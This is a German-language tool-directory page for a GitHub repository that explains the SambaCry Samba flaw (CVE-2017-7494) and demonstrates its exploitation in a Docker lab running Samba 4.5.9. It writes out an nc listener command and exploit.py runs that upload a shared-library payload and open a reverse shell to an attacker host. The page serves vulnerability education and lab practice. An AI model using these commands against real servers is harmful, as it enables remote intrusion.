Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-7494 — SambaCry-Erklärung und Exploitation-Demo | Kitploit
Tools/GitHubGitHub/yonliud/cve-2017-7494
SchwachstellenanalyseExploitationLernen & BildungLabs & Praxis
GitHubyonliud/cve-2017-7494

CVE-2017-7494

SambaCry-Erklärung und Exploitation-Demo

Repository anzeigen
23vor 26 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

SambaCry (CVE-2017-7494) Exploit

CVE-2017-7494/SambaCry ermöglicht es authentifizierten Benutzern, eine gemeinsame Bibliothek in einen beschreibbaren Ordner hochzuladen und mithilfe der hochgeladenen Bibliotheken einen Ausführungsangriff durchzuführen.

Erklärung der Schwachstelle

SambaCry ist eine Pfadvalidierungsschwachstelle in der Art und Weise, wie Samba Named-Pipe-Anfragen verarbeitet. Normalerweise werden diese Pipes verwendet, um Programmen die Kommunikation untereinander zu ermöglichen, indem sie Daten über einen dateiähnlichen Kanal lesen und schreiben.

Wenn Samba einen unbekannten Pipe-Namen empfängt, können verwundbare Versionen diesen als Namen eines dynamisch ladbaren Moduls behandeln. Diese Module sind normalerweise legitime .so-Bibliotheken, die vom Administrator installiert wurden.

Die Schwachstelle erlaubt es einem Client, anstelle eines normalen Modul- oder Pipe-Namens einen absoluten Dateisystempfad anzugeben. Samba schränkt diesen Pfad nicht ordnungsgemäß ein und kann effektiv Folgendes ausführen: dlopen("/data/example.so", ...);.

Das Laden einer gemeinsamen Bibliothek führt deren Initialisierungscode aus. Daher kann ein Angreifer, der eine bösartige .so-Datei an einen beschreibbaren Speicherort hochladen kann, den Samba-Dienst dazu veranlassen, diese zu laden, was zu Remote-Codeausführung führt.

Demo

https://github.com/user-attachments/assets/270c6725-708d-4e72-996a-b6c40e77f010

Tool herunterladen

Verwendung

  1. Einen Listener initialisieren:
root@kitploit:~
nc -lvnp 4444
  1. Den vollständigen Prozess ausführen
root@kitploit:~
python3 exploit.py --url //127.0.0.1/data --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --lhost 172.26.242.223 --lport 4444 --remote-path /data/payload.so

Um eine bereits hochgeladene Payload auszulösen:

root@kitploit:~
python3 exploit.py --stages trigger --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --remote-path /data/payload.so
  1. Im Terminal des Listeners sollte eine Shell erscheinen.

Laborumgebung

Verwendung der vorgefertigten docker-compose.yml zur Initialisierung des verwundbaren Labors.

root@kitploit:~
docker compose up -d

Das Labor verwendet Samba 4.5.9, das durch die Schwachstelle verwundbar ist.

Betroffene Versionen

3.5.0 - 4.4.13 4.5.0 - 4.5.9 4.6.0 - 4.6.3